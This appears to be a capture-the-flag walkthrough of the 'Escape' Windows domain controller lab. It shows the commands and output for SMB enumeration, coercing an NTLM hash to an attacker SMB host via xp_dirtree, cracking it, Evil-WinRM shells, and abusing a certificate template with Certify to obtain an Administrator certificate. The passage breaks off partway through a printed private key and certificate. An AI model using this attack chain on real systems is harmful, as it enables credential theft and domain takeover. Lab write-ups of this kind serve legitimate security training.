Post

Escape - Medium - Windows

Windows domain controller with no web services. Starts with enumerating a public SMB share and eventually leads to exploiting a certificate authority to gain administrator access.

Nmap Scan

Appears to be a Windows domain controller with no web services.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
# Nmap 7.92 scan initiated Sat Feb 25 20:02:55 2023 as: nmap -sC -sV -p- -oA nmap/escape-allports -v 10.129.162.142
Nmap scan report for 10.129.162.142
Host is up (0.028s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-02-26 04:04:31Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T04:06:01+00:00; +7h59m43s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f 7f54 b2ed ff74 708d 1a6d df34 b9bd
|_SHA-1: 742a b452 2191 3317 6739 5039 db9b 3b2e 27b6 f7fa
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f 7f54 b2ed ff74 708d 1a6d df34 b9bd
|_SHA-1: 742a b452 2191 3317 6739 5039 db9b 3b2e 27b6 f7fa
|_ssl-date: 2023-02-26T04:06:01+00:00; +7h59m43s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: sequel
|   NetBIOS_Domain_Name: sequel
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: sequel.htb
|   DNS_Computer_Name: dc.sequel.htb
|   DNS_Tree_Name: sequel.htb
|_  Product_Version: 10.0.17763
|_ssl-date: 2023-02-26T04:06:01+00:00; +7h59m43s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-23T20:13:30
| Not valid after:  2053-02-23T20:13:30
| MD5:   eccb 2409 86ca 2f54 e4c2 cecd a3a0 e7b7
|_SHA-1: 7629 6353 a654 d4a3 0155 0a22 e33d 86bb ae96 d4f7
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T04:06:01+00:00; +7h59m43s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f 7f54 b2ed ff74 708d 1a6d df34 b9bd
|_SHA-1: 742a b452 2191 3317 6739 5039 db9b 3b2e 27b6 f7fa
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f 7f54 b2ed ff74 708d 1a6d df34 b9bd
|_SHA-1: 742a b452 2191 3317 6739 5039 db9b 3b2e 27b6 f7fa
|_ssl-date: 2023-02-26T04:06:01+00:00; +7h59m43s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
64925/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m42s, deviation: 0s, median: 7h59m42s
| smb2-time: 
|   date: 2023-02-26T04:05:20
|_  start_date: N/A
| ms-sql-info: 
|   10.129.162.142:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 25 20:06:18 2023 -- 1 IP address (1 host up) scanned in 203.15 seconds

SMB Shares - null auth

It was possible to access public shares via SMB with null authentication.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌─[parrot@parrotos]─[~/htb/escape]
└──╼ $crackmapexec smb 10.129.228.253 -u 'smbtest' -p '' --shares
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
  "class": algorithms.Blowfish,
SMB         10.129.228.253  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.129.228.253  445    DC               [+] sequel.htb\smbtest: 
SMB         10.129.228.253  445    DC               [+] Enumerated shares
SMB         10.129.228.253  445    DC               Share           Permissions     Remark
SMB         10.129.228.253  445    DC               -----           -----------     ------
SMB         10.129.228.253  445    DC               ADMIN$                          Remote Admin
SMB         10.129.228.253  445    DC               C$                              Default share
SMB         10.129.228.253  445    DC               IPC$            READ            Remote IPC
SMB         10.129.228.253  445    DC               NETLOGON                        Logon server share 
SMB         10.129.228.253  445    DC               Public          READ            
SMB         10.129.228.253  445    DC               SYSVOL                          Logon server share 

SMB Public folder

The public folder contains a SQL procedures document. Nothing else of interest on the SMB share.

1
2
3
4
5
6
7
8
9
10
11
┌─[✗]─[parrot@parrotos]─[~/htb/escape]
└──╼ $smbclient //10.129.228.253/Public
Enter WORKGROUP\parrot's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Nov 19 11:51:25 2022
  ..                                  D        0  Sat Nov 19 11:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 13:39:43 2022

		5184255 blocks of size 4096. 1444179 blocks available
smb: \> 

Inspecting PDF document

The document appears to be an introduction for new staff members. It contains some credentials for the SQL service.

1
2
3
4
Bonus
For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with
user PublicUser and password GuestUserCantWrite1 .
Refer to the previous guidelines and make sure to switch the "Windows Authentication" to "SQL Server Authentication".

Testing credentials with WINRM and SMB

The credentials did not work with SMB or WINRM. Nothing of value yet.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌─[parrot@parrotos]─[~/htb/escape]
└──╼ $crackmapexec winrm 10.129.228.253 -u PublicUser -p GuestUserCantWrite1 
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
  "class": algorithms.Blowfish,
SMB         10.129.228.253  5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:sequel.htb)
HTTP        10.129.228.253  5985   DC               [*] http://10.129.228.253:5985/wsman
WINRM       10.129.228.253  5985   DC               [-] sequel.htb\PublicUser:GuestUserCantWrite1
┌─[parrot@parrotos]─[~/htb/escape]
└──╼ $crackmapexec smb 10.129.228.253 -u PublicUser -p GuestUserCantWrite1 --shares
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
  "class": algorithms.Blowfish,
SMB         10.129.228.253  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.129.228.253  445    DC               [-] sequel.htb\PublicUser:GuestUserCantWrite1 STATUS_ACCESS_DENIED 
SMB         10.129.228.253  445    DC               [-] Error enumerating shares: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

Testing credentials with MSSQL

Since the credentials were related to SQL it made sense to test them with the intended purpose in mind. It was possible to authenticate and connect to the MSSQL service.

1
2
3
4
5
6
7
8
9
10
11
12
13
┌─[✗]─[parrot@parrotos]─[/opt/impacket/impacket]
└──╼ $mssqlclient.py PublicUser:GuestUserCantWrite1@sequel.htb
Impacket v0.10.1.dev1+20230712.145931.275f4b97 - Copyright 2022 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (PublicUser  guest@master)> 

Attempting to execute shell commands via MSSQL

Unfortunately it was not possible to execute commands or unlock the ability to do so with this user.

1
2
3
4
5
6
7
8
SQL (PublicUser  guest@master)> xp_cmdshell whoami
[-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (PublicUser  guest@master)> enable_xp_cmdshell
[-] ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action.
[-] ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC\SQLMOCK): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (PublicUser  guest@master)> 

Stealing the NTLM hash

After trying to access my own SMB share with the xp_dirtree command it was possible to intercept the NTLM hash using responder.

1
2
3
4
SQL (PublicUser  guest@master)> xp_dirtree //10.10.14.96/share/test
subdirectory   depth   file   
------------   -----   ----   
SQL (PublicUser  guest@master)> 
1
2
3
4
5
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.228.253
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:a0fb2fd402013d12:0******0

Cracking NTLM hash

Cracking the hash with John the Ripper was possible and unlocked a set of credentials.

1
2
3
4
5
6
7
8
9
10
┌─[✗]─[parrot@parrotos]─[~/htb/escape]
└──╼ $john ntlmhash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
R*********e (sql_svc)
1g 0:00:00:03 DONE (2023-07-14 22:35) 0.2590g/s 2772Kp/s 2772Kc/s 2772KC/s RENZOJAVIER..REDMAN69
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

Testing credentials

It looks like the credentials work with WINRM. Nothing new on SMB shares.

1
2
3
4
5
6
7
┌─[parrot@parrotos]─[~/htb/escape]
└──╼ $cme winrm 10.129.228.253 -u 'sql_svc' -p 'R*********e' 
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
  "class": algorithms.Blowfish,
SMB         10.129.228.253  5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:sequel.htb)
HTTP        10.129.228.253  5985   DC               [*] http://10.129.228.253:5985/wsman
WINRM       10.129.228.253  5985   DC               [+] sequel.htb\sql_svc:R*********e (Pwn3d!)

Logging in via WINRM as sql_svc

1
2
3
4
5
6
7
8
9
10
11
12
┌─[parrot@parrotos]─[~/htb/escape]
└──╼ $evil-winrm -i 10.129.228.253 -u 'sql_svc' -p 'R*********e'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\sql_svc\Documents>

Certify - testing as sql_svc user

There seems to be a certificate authority on the domain controller as the certificate naming scheme hints at it. Certify was used to check for any vulnerable certificates and none were found.

1
2
3
4
5
6
7
*Evil-WinRM* PS C:\programdata> upload Certify.exe
Info: Uploading Certify.exe to C:\programdata\Certify.exe

                                                             
Data: 236884 bytes of 236884 bytes copied

Info: Upload successful!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
*Evil-WinRM* PS C:\programdata> .\certify.exe find /vulnerable 

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[+] No Vulnerable Certificates Templates found!



Certify completed in 00:00:10.8880243

Exploring file system

Exploring the file system lead to finding a username and password in an error log produced by MSSQL. The password was typed as the username so it must have been inadvertently logged.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
*Evil-WinRM* PS C:\programdata> cd c:\
*Evil-WinRM* PS C:\> ls


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/1/2023   8:15 PM                PerfLogs
d-r---         2/6/2023  12:08 PM                Program Files
d-----       11/19/2022   3:51 AM                Program Files (x86)
d-----       11/19/2022   3:51 AM                Public
d-----         2/1/2023   1:02 PM                SQLServer
d-r---         2/1/2023   1:55 PM                Users
d-----         2/6/2023   7:21 AM                Windows
1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\> cd SQLServer
*Evil-WinRM* PS C:\SQLServer> ls


    Directory: C:\SQLServer


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:06 AM                Logs
d-----       11/18/2022   1:37 PM                SQLEXPR_2019
-a----       11/18/2022   1:35 PM        6379936 sqlexpress.exe
-a----       11/18/2022   1:36 PM      268090448 SQLEXPR_x64_ENU.exe
1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\SQLServer> cd logs
*Evil-WinRM* PS C:\SQLServer\logs> ls


    Directory: C:\SQLServer\logs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK
1
2
3
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosq***'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]

Testing credentials - Ryan.Cooper

These new credentials are valid and allow WINRM access.

1
2
3
4
5
6
7
┌─[parrot@parrotos]─[~/htb/escape]
└──╼ $cme winrm 10.129.228.253 -u 'ryan.cooper' -p 'NuclearMosq***'
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
  "class": algorithms.Blowfish,
SMB         10.129.228.253  5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:sequel.htb)
HTTP        10.129.228.253  5985   DC               [*] http://10.129.228.253:5985/wsman
WINRM       10.129.228.253  5985   DC               [+] sequel.htb\ryan.cooper:NuclearMosquito3 (Pwn3d!)
1
2
3
4
5
6
7
8
9
10
11
12
┌─[✗]─[parrot@parrotos]─[~/htb/escape]
└──╼ $evil-winrm -i 10.129.228.253 -u 'ryan.cooper' -p 'NuclearMosq***'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> 

User flag captured.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> ls


    Directory: C:\Users\Ryan.Cooper\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/14/2023  10:05 PM             34 user.txt


*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt
ad8fea354fee7aa6ac550d0c994a7246
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> 

Certify check with new user - Ryan.Cooper

Next logical step is to repeat the certify check with the new user. After running the check it found a vulnerable certificate.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
*Evil-WinRM* PS C:\programdata> .\Certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:10.1796054

Escalating to Administrator

The plan now is to generate a certificate which can be used by Rubeus to expose the administrator NTLM hash.

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\programdata> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Brandon.Brown            Guest
James.Roberts            krbtgt                   Nicole.Thompson
Ryan.Cooper              sql_svc                  Tom.Henn
The command completed with one or more errors.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
*Evil-WinRM* PS C:\programdata> .\certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 10

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAp0NDlZKGeEtJecK2XJP9u68p874vzSZXMCMjOXKWw7bKlb1g
LUfS3J6iJ7CiF1boRrkGJfM6hnOtlqlOj1h1B7Kq64e1hQB8O9S2TrgSQXo7ryAv
8XIbFc9GO1ja+poD/0KrpBiWJCtyZiO38VLO0H3t+d+6BrCC5lHS7qrc+WPR17Ot
Q7tK3oGeybDIU3rE7TSMsD9cLYC/ByTaP29i90VY1dasO4CiwWhdLEVbQUJAOm/4
yja42A/PS5JZIOE/zzvue5gwYAH04jifjhDRbdynqt+LoMF5L02mA1Q3TNZ8gmEs
Gqe/t2B6nlbowBfc9I62iiPpnzttW7qXA58b3QIDAQABAoIBAHA3l6NFAAS69hvD
v9eSznvaBDpskeOAYqSAHoTPVUkPXRFjUaBvfI/Zug8I2WbxPrscLXzOl6hW+dKH
2pYfkbzNaRDGJsmJzs/RYVKk+lKFsH9JCAFkPbm/K25rqdbR9/aNA1z/xdOUdpcC
RcmZdfm5Uyz+pe8RA3GE2hCX/9MsyBkCIcNIEZEdvdGyzUfu6CJYRLHoz5+VTxmp
oijBzVsZhmjOc7ph6P2kz1mfE4MFW7MHD+3t3A5CourOyi+WIrf9MkrlMapZEhvq
UitUnrMWebdiKCjvaDcajyRKF8FT6d7Z9nbt7+7xRNZYlG4OfSxkccnH4asC3k01
b7cePF0CgYEA25J3av+K7b1ZSET7pS2ZezWjnse5KBHpRt85wT61jnMQCHKvloiB
Mrfs3e9RKIsG5lX0Gu1+38tGpPbyVXGSYPVKiVnwbXe6vBndqLQsbp4Lgmlq/muT
5Q/c/gX9iS6FWOXblJL7awvDkT7WludcO+1G+ak02TvHy/9pB10sX+t53JoVqIpD
QmXIwIwS7BPfhnzerxlEAPSGrGZvgV3sRX2WH6cCgYBGezyEByVkbQx0y1fvzLRg
vXYZKMlBmIZGLq+OXX/QCxVRcOb2LjlgTOYXoZlt74SGPaPcfzikAMSualT5EYmK
1kErw0cdzaz9wnina9TmWhr8TtjnguUmLlJRK6Ke/fXq0JrGcIg52TuMSuEjXGff
dQMWMEUDYXOkkG8v8OlSUwKBgQCaGQMs58/hs/lyyyFho+wn1yHZoByrwIPP5tXf
jhUfIhXtup2xg9L3O6CcrIC1xa2Ja+LLL9TWWk91NnCixcfUyKypcvtP69LQHfRx
Wlcqc33SZv3DgokxC3xEM6PxIUUaEF+DuUCAfm95Y17PPB8PSCzHgHJnCu7z0A8i
/lFBowKBgHROsK7+a3ZxAorp/3KL3PkdFXLxA9Nh2pLW53gZ5rasxqaYbDVqPhmU
+AzgkUmUfuvCaIcLEuIQHGT8USIK9U/OwovdSOehAiSAwytnLH3hw9nNK4YMcm9r
zvkBshf2bN4DN0kPfWEf7kbg3T8ZpNDzmGoW2EBzKl4pVbHXowHB
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAAr7zKKxlyQRDgAAAAAACjANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjMwNzE1MDU0NzA3WhcNMjUwNzE1
MDU1NzA3WjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCnQ0OVkoZ4S0l5wrZck/27rynz
vi/NJlcwIyM5cpbDtsqVvWAtR9LcnqInsKIXVuhGuQYl8zqGc62WqU6PWHUHsqrr
h7WFAHw71LZOuBJBejuvIC/xchsVz0Y7WNr6mgP/QqukGJYkK3JmI7fxUs7Qfe35
37oGsILmUdLuqtz5Y9HXs61Du0regZ7JsMhTesTtNIywP1wtgL8HJNo/b2L3RVjV
1qw7gKLBaF0sRVtBQkA6b/jKNrjYD89Lklkg4T/PO+57mDBgAfTiOJ+OENFt3Keq
34ugwXkvTaYDVDdM1nyCYSwap7+3YHqeVujAF9z0jraKI+mfO21bupcDnxvdAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZAIBBTApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1BZG1pbmlzdHJhdG9yMB8GA1Ud
